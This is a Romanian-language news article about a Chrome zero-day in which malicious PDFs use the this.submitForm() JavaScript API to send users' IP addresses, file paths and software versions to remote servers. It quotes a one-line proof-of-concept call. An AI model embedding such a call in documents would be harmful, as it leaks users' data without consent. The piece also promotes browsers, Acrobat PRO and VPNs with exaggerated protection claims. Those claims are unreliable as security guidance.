Friendoffriends
Serviciul de detectare a exploatării EdgeSpot a descoperit o intrigantă vulnerabilitate Chrome de zi zero care exploatează documente PDF.
Vulnerabilitatea permite atacatorilor să culeagă date sensibile folosind documente PDF rău intenționate deschise în Chrome.
De îndată ce victima deschide fișierele PDF respective în Google Chrome, un program rău intenționat începe să funcționeze în fundal prin colectarea datelor utilizatorilor.
Datele sunt apoi redirecționate către serverul de la distanță care este controlat de hackeri. S-ar putea să vă întrebați ce date sunt absorbite de atacatori, aceștia vizează următoarele date de pe computerul dvs.:
- adresa IP
- Calea completă a fișierului PDF de pe sistem
- Versiuni de sistem de operare și Chrome
Feriți-vă de fișierele PDF cu malware
Experții au observat că unul dintre cele două domenii readnotify [.] com sau burpcollaborator [.] net primea datele.
Au dezvăluit că atacatorii folosesc this.submitForm () PDF Javascript API pentru a colecta informații sensibile ale utilizatorilor.
L-am testat cu un PoC minim, un apel API simplu this.submitForm („http://google.com/test”) va face ca Google Chrome să trimită datele personale către google.com.
Această eroare Chrome a fost exploatată de două seturi distincte de fișiere PDF rău intenționate, ambele circulate în octombrie 2017 și, respectiv, în septembrie 2018.
În special, datele colectate pot fi folosite de atacatori pentru a regla fin atacurile în viitor. Rapoartele sugerează că primul lot de fișiere a fost compilat folosind serviciul de urmărire PDF ReadNotify.
Utilizatorii pot utiliza serviciul pentru a urmări vizualizările utilizatorilor. EdgeSpot nu a împărtășit niciun detaliu cu privire la natura celui de-al doilea set de fișiere PDF.
Sfat rapid: Schimbați browserul în Opera
În aceste vremuri tulburi, suntem atacați cu malware, phishing și troieni la fiecare pas, așa că trebuie să fim mult mai vigilenți și să fim protejați.
Și întrucât aceasta este o problemă specifică Chrome, puteți evita această amenințare și toate celelalte cu un browser orientat spre securitate, cum ar fi Opera.
Acest browser vine cu un blocator de anunțuri încorporat care nu numai că șterge astfel de distrageri, ci și blochează scripturile de analiză, pixelii de urmărire și metodele de colectare a datelor.
Și dacă doriți să fiți absolut siguri că vă feriți de orice pericol, rămâneți în spatele serviciului VPN încorporat, care este 100% gratuit pentru un timp nelimitat.
Operă
Opera oferă protecția perfectă împotriva amenințărilor cu ajutorul blocatorului de anunțuri încorporat și al serviciului VPN gratuit! Ia-l gratuit Vizitati site-ulCum pot fi protejat de vulnerabilitățile PDF?
Descărcați Adobe Acrobat PRO
Adobe și Chrome se potrivesc bine atunci când vine vorba de gestionarea fișierelor PDF. Prin instalarea extensiei Adobe pentru Chrome, puteți examina și manipula PDF-urile după bunul plac, fără a părăsi browserul preferat.
În ciuda structurii sale robuste, este posibil ca programele malware ascunse în fișierele PDF să nu fie detectate dacă utilizați versiunea standard a Reader-ului.
Versiunea profesională este recomandată pentru a vă garanta protecția și a vă menține datele departe de hackeri.
Deși nu este gratuit, prețul pe care îl veți plăti este destul de mic pentru multitudinea de caracteristici suplimentare de care vă veți bucura, inclusiv securitatea îmbunătățită a fișierelor PDF.
Există, de asemenea, o perioadă de încercare gratuită de 7 zile, astfel încât să puteți profita de experiența Pro completă înainte de a efectua achiziția.
Adobe Acrobat PRO
Stai departe de malware prin descărcarea Adobe Acrobat PRO. Are mai multe funcții decât versiunea gratuită și vă păstrează datele în siguranță. Încercare gratuită Vizitați site-ul web Citiți mai multeÎn cazul în care doriți să fiți în siguranță în timp ce navigați pe internet, va trebui să obțineți un instrument dedicat complet pentru a vă securiza rețeaua. Instalați accesul la internet privat acum și asigură-te. Vă protejează computerul de atacuri în timp ce navigați, vă maschează adresa IP și blochează tot accesul nedorit.
Serviciul de detectare a exploatării EdgeSpot a dorit să alerteze utilizatorii Chrome despre riscurile potențiale, deoarece patch-ul nu era de așteptat să fie lansat în viitorul apropiat..
EdgeSpot a raportat la Google despre vulnerabilitatea anul trecut, iar compania a promis să lanseze un patch la sfârșitul lunii aprilie.
Cu toate acestea, puteți lua în considerare utilizarea unei soluții temporare la problemă, vizualizând local documentele PDF primite folosind o altă aplicație de citire.
Alternativ, puteți deschide documentele PDF în Chrome deconectând sistemele de la Internet.
Întrebări frecvente: Aflați mai multe despre extensiile Chrome
- Funcționează Privacy Badger cu Chrome?
Da, da. Dar dacă doriți o selecție mai largă, explorați opțiunile noastre de top pentru extensiile de confidențialitate Chrome în acest ghid complet.
- Puteți edita PDF-uri în Chrome?
Există o mulțime de extensii care permit procesarea PDF-urilor. Consultați ghidul nostru excelent despre cele mai bune extensii PDF pentru Chrome.
- Are Google un generator de cod QR?
Nu, dar îl puteți activa rapid. Iată ghidul nostru cuprinzător despre cum să activați generatorul de cod QR în Chrome.
Nota editorului: Această postare a fost publicată inițial în aprilie 2020 și de atunci a fost renovată și actualizată în august 2020 pentru prospețime, acuratețe și exhaustivitate.
- Securitate cibernetică
